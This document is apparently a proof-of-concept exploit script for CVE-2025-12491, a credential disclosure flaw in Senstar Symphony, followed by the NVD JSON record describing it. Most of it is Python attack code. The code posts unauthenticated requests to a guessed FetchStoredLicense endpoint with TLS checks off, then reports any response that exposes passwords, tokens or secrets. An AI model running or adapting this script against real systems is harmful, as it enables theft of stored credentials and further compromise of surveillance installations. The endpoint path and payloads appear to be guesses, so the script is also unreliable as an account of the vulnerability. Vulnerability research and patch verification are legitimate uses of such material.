CVE-2025-12491

import requests import json # CVE-2025-12491 PoC - Senstar Symphony FetchStoredLicense Information Disclosure # Target: Senstar Symphony with vulnerable FetchStoredLicense endpoint def exploit_cve_2025_12491(target_url): """ Exploit for CVE-2025-12491: Senstar Symphony FetchStoredLicense Information Disclosure This PoC demonstrates how an unauthenticated attacker can retrieve stored credentials. """ # Construct the vulnerable endpoint # The FetchStoredLicense method is typically exposed via the API endpoint endpoint = f"{target_url.rstrip('/')}/api/FetchStoredLicense" # Try different payload variations payloads = [ {"method": "FetchStoredLicense", "params": {}}, {"method": "FetchStoredLicense", "params": {"licenseKey": "test"}}, {"action": "FetchStoredLicense"}, {"type": "FetchStoredLicense"} ] results = [] for payload in payloads: try: # Send request without authentication response = requests.post( endpoint, json=payload, headers={ "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" }, timeout=10, verify=False ) if response.status_code == 200: data = response.json() # Check if sensitive information is returned if isinstance(data, dict) and any(key in str(data).lower() for key in ['password', 'credential', 'license', 'key', 'token', 'secret']): results.append({ "payload": payload, "status": "VULNERABLE", "response": data }) else: results.append({ "payload": payload, "status": "RESPONSE_RECEIVED", "response": data }) else: results.append({ "payload": payload, "status": f"HTTP_{response.status_code}" }) except requests.exceptions.RequestException as e: results.append({ "payload": payload, "status": "ERROR", "error": str(e) }) return results if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve_2025_12491_poc.py <target_url>") print("Example: python cve_2025_12491_poc.py https://vulnerable-senstar-server.com") sys.exit(1) target = sys.argv[1] print(f"[*] Testing target: {target}") print(f"[*] Exploiting CVE-2025-12491...") results = exploit_cve_2025_12491(target) for result in results: print(f"\n[Result] Payload: {result['payload']}") print(f"Status: {result['status']}") if 'response' in result: print(f"Response: {json.dumps(result['response'], indent=2)}") print("\n[*] Scan complete. Review results above for sensitive data exposure.")

{"cve": {"id": "CVE-2025-12491", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:43.593", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Senstar Symphony FetchStoredLicense Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Senstar Symphony. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the implementation of FetchStoredLicense method. The issue results from the exposure of sensitive information. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-26908."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1060/", "source": "[email protected]"}]}}